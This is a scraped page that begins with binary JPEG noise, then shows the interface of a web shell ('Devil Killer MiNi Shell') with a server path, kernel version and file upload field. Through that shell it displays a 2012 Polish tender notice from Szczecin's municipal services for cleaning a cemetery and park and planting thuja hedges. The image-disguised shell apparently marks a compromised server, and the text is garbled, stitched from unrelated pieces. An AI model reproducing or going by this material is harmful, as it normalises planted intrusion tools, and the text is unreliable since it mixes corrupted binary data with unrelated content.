JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120912/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120912/196321-N-2012.html

<p class="kh_header"><b>Szczecin: ZAGOSPODAROWANIE TERENÓW ZIELENI
 (w podziale na części)</b><br>
<b>Numer ogłoszenia: 196321 - 2012; data zamieszczenia: 12.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Usług Komunalnych , ul. Ku Słońcu 125a, 71-080 Szczecin, woj. zachodniopomorskie, tel. 091 484 82 94, faks 091 484 80 55.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zuk.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna jednostki samorządu terytorialnego - samorządowy zakład budżetowy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAGOSPODAROWANIE TERENÓW ZIELENI
 (w podziale na części).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. 	Przedmiotem zamówienia jest zagospodarowanie terenów zieleni - w podziale na części:
     CZĘŚĆ I:  	Uporządkowanie nieczynnego cmentarza przy ul. Nowy Świat w Szczecinie
     CZĘŚĆ II:  	Uporządkowanie parku Lipy w Szczecinie
     CZĘŚĆ III: 	Zagospodarowanie terenów zielonych przy ul. Goszczyńskiego w Szczecinie
     CZĘŚĆ IV: 	Dostawa wraz z nasadzeniem krzewów iglastych wokół placu zabaw przy 
ul. Zawiłej w Szczecinie
      
CPV 
79313000-7   Usługi utrzymania parków
77310000-6   Usługi sadzenia roślin oraz utrzymania terenów zielonych
77300000-3   Usługi ogrodnicze

2.  Przedmiot zamówienia obejmuje: 
     1) część I:
         a)	powierzchniowe oczyszczenie terenu z gałęzi, liści, śmieci oraz gruzu i resztek budowlanych wraz z wywozem i utylizacją 1,91 ha (działka nr 58 Bz obr. 3041 oraz część działki nr 9 N obr. 3041),
         b)	wykaszanie chwastów i jednorocznych samosiewów na terenie zadrzewionym wraz 
z wywozem i utylizacją 1,91 ha (działka nr 58 Bz obr. 3041 oraz część działki nr 9 N obr. 3041),
         c)	wycinka samosiewów drzew do lat 10 wraz ze zrębkowaniem i rozrzuceniem zrębków po terenie ok. 800 szt. (działka nr 58 Bz obr. 3041 oraz część działki nr 9 N obr. 3041),
     2) część II:
         a)	pielęgnacja drzewostanu (wszystkie drzewa znajdujące się na obiekcie - 42 szt.), 
tj. wykonanie wszelkich niezbędnych zabiegów, tj. usunięcie posuszu, cięcia korekcyjne, cięcia prześwietlające, montaż wiązań elastycznych, itp.,
         b)	uporządkowanie terenu, tj. wykoszenie, posprzątanie terenu ze wszelkich nieczystości, usunięcie samosiewów - teren 150 m2,
         c)	usunięcie 2 szt. zniszczonych koszy na śmieci,
         d)	usunięcie wszystkich urządzeń sportowych na obiekcie (wraz z wykopaniem podstawy i fundamentów) oraz metalowych elementów i pozostałości 
po metalowych siedziskach,
         e)	prace towarzyszące:
	A. 	usunięcie i uprzątnięcie wszelkich zanieczyszczeń powstałych wskutek prowadzonych prac,
	B.	uprzątnięcie terenu po wykopywanych urządzeniach, dowiezienie w ich     miejsce ziemi, wyrównanie nawierzchni i jej zagęszczenie, 
	C.	usuwanie przeszkód utrudniających prawidłowe wykonanie robót, w tym dodatkowe działania związane z prowadzeniem robót w czasie mrozów lub opadów atmosferycznych, itp.,
     3) część III:
         a)	zabezpieczenie systemu korzeniowego 6 sztuk drzew z rodzaju kasztanowiec czerwony, rosnących przy ul. Goszczyńskiego w Szczecinie, poprzez nawiezienie ziemi kompostowej i jej zagęszczenie,
         b)	pokrycie ok. 70 m2 terenu 10 - centymetrową warstwą ziemi kompostowej (ok. 
10 m3 ziemi - łącznie z ziemią przeznaczoną na uzupełnienia donic),

 
         c)	przewiezienie z siedziby ZUK - u we wskazane miejsce (zaznaczone na mapie - 
ul. Goszczyńskiego; działka 11/8 obręb 2066) 6 sztuk betonowych donic oraz uzupełnienie ich ziemią kompostową (pojemność mniejszych donic ok. 0,08 m3, pojemność większych donic (ok. 1,15 m3),
     4) część IV:
         a)	dostawa roślin ozdobnych z gatunku Thuja occidentalis Smaragd (100 sztuk) - wysokość minimalna to 140 cm, do nasadzenia w formie żywopłotu o łącznej długości 70 m (2 odcinki po 20 m i 1 odcinek 30 m), rozstawa co 70 cm,
         b)	przygotowanie terenu i posadzenie roślin, pielęgnacja gwarancyjna,
         c)	materiał sadzeniowy:
	A. 	dostarczone rośliny powinny być zgodne z normą PN - R - 67022, oznaczone   etykietami, na których znajduje się nazwa łacińska, forma, wybór, wysokość,
	B.	krzewy powinny być prawidłowo uformowane, o wyrównanej wysokości, 
z zachowaniem pokroju charakterystycznego dla odmiany,
	C.	pędy powinny być przycięte,
	D.	przewodnik powinien być praktycznie prosty,
	E.	system korzeniowy powinien być skupiony i prawidłowo rozwinięty, 
na korzeniach szkieletowych powinny występować liczne korzenie drobne,
	F.	bryła korzeniowa powinna być prawidłowo uformowana i nieuszkodzona,
	G.	pąk szczytowy przewodnika powinien być wyraźnie uformowany,
	H.	wady niedopuszczalne:
		-  uszkodzenia mechaniczne roślin,
		-  ślady żerowania szkodników,
		-  oznaki chorobowe,
		-  zwiędnięcie i pomarszczenie kory na korzeniach i częściach naziemnych,
		-  martwice i pęknięcia kory,
		-  uszkodzenia pąka szczytowego przewodnika, 
		-  uszkodzenie lub przesuszenie bryły korzeniowej,
	I.	sadzenie żywopłotu to dostarczenie roślin na miejsce sadzenia, wyznaczenie miejsc sadzenia, wykopanie dołów, zalanie wodą, całkowite zaprawienie dołów ziemią urodzajną (należy użyć żyznej gleby o odczynie pH 4,5 - 5,5), podlanie krzewów, wykonanie misy i wymulczowanie korą (warstwa grubości 8 cm),
	J.	pielęgnacja gwarancyjna to w okresie 24 miesięcy od daty odbioru prac:
		-  odchwaszczanie mis,
		-  podlewanie wg potrzeb,
		-  zwalczanie chorób i szkodników,
		-  cięcia sanitarne,
		-  wymiana chorych lub martwych roślin, przy czym okres gwarancji 
		   rozpocznie swój bieg od dnia pisemnego potwierdzenia wymiany rośliny
                 przez Zamawiającego; 
		-  inne zabiegi niezbędne do zachowania roślin w dobrej kondycji.
3.  Lokalizacja obiektów i miejsc wykonywania prac objętych przedmiotem zamówienia została określona odpowiednio w załącznikach nr 6 - 9 do SIWZ.
4.		Wykonawca wykona przedmiot zamówienia zgodnie z zasadami współczesnej wiedzy technicznej, obowiązującymi normami, przepisami prawa powszechnie obowiązującego, m. in. ustawą z dnia 27 kwietnia 2001 r. o odpadach (t.j. Dz.U. z 2010 r. Nr 185 poz. 1243 ze zmianami), a także z zapisami Specyfikacji Istotnych Warunków Zamówienia 
i z ofertą, które będą stanowiły integralną część umowy.


5. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy 
w stosunku do treści oferty polegających na:
      1) 	zmianie przedmiotu zamówienia,
2)  	zmianie terminu realizacji przedmiotu zamówienia,
3)  	zmianie wynagrodzenia.
6.	Zmiany w umowie będą możliwe na warunkach opisanych poniżej: 
1)	wystąpi konieczność wykonania zamówienia dodatkowego, którego realizacja będzie miała wpływ na termin realizacji przedmiotu zamówienia, 
2)	w trakcie wykonywania robót wystąpią nieprzewidziane warunki realizacji i będzie to miało wpływ na termin realizacji przedmiotu zamówienia,
3)	w trakcie wykonywania przedmiotu zamówienia wystąpią przeszkody o obiektywnym charakterze, w tym: klęski żywiołowe, warunki atmosferyczne uniemożliwiające prowadzenie prac lub dokonanie odbioru, warunki pogodowe uniemożliwiających, 
ze względów technologicznych prowadzenia prac - pomimo dołożenia przez Wykonawcę wszelkich starań, aby prace mogły zostać zrealizowane, 
       4)		w przypadku innej okoliczności prawnej, ekonomicznej lub technicznej skutkującej niemożliwością wykonania lub nienależytym wykonaniem przedmiotu zamówienia zgodnie z SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.31.30.00-7, 77.31.00.00-6, 77.30.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Tylko część II:
Opis sposobu dokonywania oceny spełniania warunku: 
Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że wykonuje lub wykonał należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej  jedną pracę podobną do prac objętych przedmiotem zamówienia. 
Za pracę podobną do przedmiotu zamówienia Zamawiający uzna pracę polegającą 
na wykonaniu prac w drzewostanie, o wartości nie mniejszej niż 10 000,00 zł brutto, do dnia, w którym upływa termin składania ofert.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto wykonawcy mają dołączyć do oferty następujące dokumenty:
       1)  ofertę cenową - zgodnie z rozdziałem I pkt 3 SIWZ;
 	W przypadku składania oferty wspólnej należy złożyć jedną ofertę cenową;
2)	odpowiednie pełnomocnictwa;  
	Tylko w sytuacjach określonych w rozdziale I pkt 5 zdanie drugie SIWZ lub 
	w przypadku składania oferty wspólnej (rozdział III pkt 1 SIWZ); 
       3)	oświadczenie według wzoru stanowiącego załącznik nr 1 do SIWZ, wskazujące cześć 	zamówienia, której wykonanie wykonawca powierzy podwykonawcom (jeżeli 	wykonawca przewiduje udział podwykonawców);
            W przypadku składania oferty wspólnej należy złożyć jedno oświadczenie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy 
w stosunku do treści oferty polegających na:
      1) 	zmianie przedmiotu zamówienia,
2)  	zmianie terminu realizacji przedmiotu zamówienia,
3)  	zmianie wynagrodzenia.
2.	Zmiany w umowie będą możliwe na warunkach opisanych poniżej: 
1)	wystąpi konieczność wykonania zamówienia dodatkowego, którego realizacja będzie miała wpływ na termin realizacji przedmiotu zamówienia, 
2)	w trakcie wykonywania robót wystąpią nieprzewidziane warunki realizacji i będzie to miało wpływ na termin realizacji przedmiotu zamówienia,
3)	w trakcie wykonywania przedmiotu zamówienia wystąpią przeszkody o obiektywnym charakterze, w tym: klęski żywiołowe, warunki atmosferyczne uniemożliwiające prowadzenie prac lub dokonanie odbioru, warunki pogodowe uniemożliwiających, 
ze względów technologicznych prowadzenia prac - pomimo dołożenia przez Wykonawcę wszelkich starań, aby prace mogły zostać zrealizowane, 
       4)		w przypadku innej okoliczności prawnej, ekonomicznej lub technicznej skutkującej niemożliwością wykonania lub nienależytym wykonaniem przedmiotu zamówienia zgodnie z SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zuk.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego - 71-080 Szczecin, ul. Ku Słońcu 125A; pok. 17-18.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.09.2012 godzina 10:00, miejsce: Siedziba Zamawiającego - 71-080 Szczecin, ul. Ku Słońcu 125A; sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca 
w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.  
2.W przypadku, gdy jakakolwiek wartość dotycząca warunków udziału w postępowaniu została wyrażona 
w walucie obcej, Zamawiający przeliczy tą wartość w oparciu o średni kurs walut NBP dla danej waluty z daty wszczęcia postępowania o udzielenie zamówienia publicznego (datą wszczęcia postępowania jest data zamieszczenia ogłoszenia o zamówieniu w miejscu publicznie dostępnym w siedzibie Zamawiającego oraz na stronie internetowej). Jeżeli w tym dniu nie będzie opublikowany średni kurs NBP, Zamawiający przyjmie kurs średni z ostatniej tabeli przed wszczęciem postępowania.
3. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie SPEŁNIA/NIE SPEŁNIA.
4. Zadanie nie dotyczy umowy ramowej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Uporządkowanie nieczynnego cmentarza przy ul. Nowy Świat w Szczecinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> część I:
         a)	powierzchniowe oczyszczenie terenu z gałęzi, liści, śmieci oraz gruzu i resztek budowlanych wraz z wywozem i utylizacją 1,91 ha (działka nr 58 Bz obr. 3041 oraz część działki nr 9 N obr. 3041),
         b)	wykaszanie chwastów i jednorocznych samosiewów na terenie zadrzewionym wraz 
z wywozem i utylizacją 1,91 ha (działka nr 58 Bz obr. 3041 oraz część działki nr 9 N obr. 3041),
         c)	wycinka samosiewów drzew do lat 10 wraz ze zrębkowaniem i rozrzuceniem zrębków po terenie ok. 800 szt. (działka nr 58 Bz obr. 3041 oraz część działki nr 9 N obr. 3041).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.31.30.00-7, 77.31.00.00-6, 77.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Uporządkowanie parku Lipy w Szczecinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> część II:
         a)	pielęgnacja drzewostanu (wszystkie drzewa znajdujące się na obiekcie - 42 szt.), 
tj. wykonanie wszelkich niezbędnych zabiegów, tj. usunięcie posuszu, cięcia korekcyjne, cięcia prześwietlające, montaż wiązań elastycznych, itp.,
         b)	uporządkowanie terenu, tj. wykoszenie, posprzątanie terenu ze wszelkich nieczystości, usunięcie samosiewów - teren 150 m2,
         c)	usunięcie 2 szt. zniszczonych koszy na śmieci,
         d)	usunięcie wszystkich urządzeń sportowych na obiekcie (wraz z wykopaniem podstawy i fundamentów) oraz metalowych elementów i pozostałości 
po metalowych siedziskach,
         e)	prace towarzyszące:
	A. 	usunięcie i uprzątnięcie wszelkich zanieczyszczeń powstałych wskutek prowadzonych prac,
	B.	uprzątnięcie terenu po wykopywanych urządzeniach, dowiezienie w ich     miejsce ziemi, wyrównanie nawierzchni i jej zagęszczenie, 
	C.	usuwanie przeszkód utrudniających prawidłowe wykonanie robót, w tym dodatkowe działania związane z prowadzeniem robót w czasie mrozów lub opadów atmosferycznych, itp.,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.31.30.00-7, 77.31.00.00-6, 77.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zagospodarowanie terenów zielonych przy ul. Goszczyńskiego w Szczecinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> część III:
         a)	zabezpieczenie systemu korzeniowego 6 sztuk drzew z rodzaju kasztanowiec czerwony, rosnących przy ul. Goszczyńskiego w Szczecinie, poprzez nawiezienie ziemi kompostowej i jej zagęszczenie,
         b)	pokrycie ok. 70 m2 terenu 10 - centymetrową warstwą ziemi kompostowej (ok. 
10 m3 ziemi - łącznie z ziemią przeznaczoną na uzupełnienia donic),

 
         c)	przewiezienie z siedziby ZUK - u we wskazane miejsce (zaznaczone na mapie - 
ul. Goszczyńskiego; działka 11/8 obręb 2066) 6 sztuk betonowych donic oraz uzupełnienie ich ziemią kompostową (pojemność mniejszych donic ok. 0,08 m3, pojemność większych donic (ok. 1,15 m3).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.31.30.00-7, 77.31.00.00-6, 77.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa wraz z nasadzeniem krzewów iglastych wokół placu zabaw przy 
ul. Zawiłej w Szczecinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> część IV:
         a)	dostawa roślin ozdobnych z gatunku Thuja occidentalis Smaragd (100 sztuk) - wysokość minimalna to 140 cm, do nasadzenia w formie żywopłotu o łącznej długości 70 m (2 odcinki po 20 m i 1 odcinek 30 m), rozstawa co 70 cm,
         b)	przygotowanie terenu i posadzenie roślin, pielęgnacja gwarancyjna,
         c)	materiał sadzeniowy:
	A. 	dostarczone rośliny powinny być zgodne z normą PN - R - 67022, oznaczone   etykietami, na których znajduje się nazwa łacińska, forma, wybór, wysokość,
	B.	krzewy powinny być prawidłowo uformowane, o wyrównanej wysokości, 
z zachowaniem pokroju charakterystycznego dla odmiany,
	C.	pędy powinny być przycięte,
	D.	przewodnik powinien być praktycznie prosty,
	E.	system korzeniowy powinien być skupiony i prawidłowo rozwinięty, 
na korzeniach szkieletowych powinny występować liczne korzenie drobne,
	F.	bryła korzeniowa powinna być prawidłowo uformowana i nieuszkodzona,
	G.	pąk szczytowy przewodnika powinien być wyraźnie uformowany,
	H.	wady niedopuszczalne:
		-  uszkodzenia mechaniczne roślin,
		-  ślady żerowania szkodników,
		-  oznaki chorobowe,
		-  zwiędnięcie i pomarszczenie kory na korzeniach i częściach naziemnych,
		-  martwice i pęknięcia kory,
		-  uszkodzenia pąka szczytowego przewodnika, 
		-  uszkodzenie lub przesuszenie bryły korzeniowej,
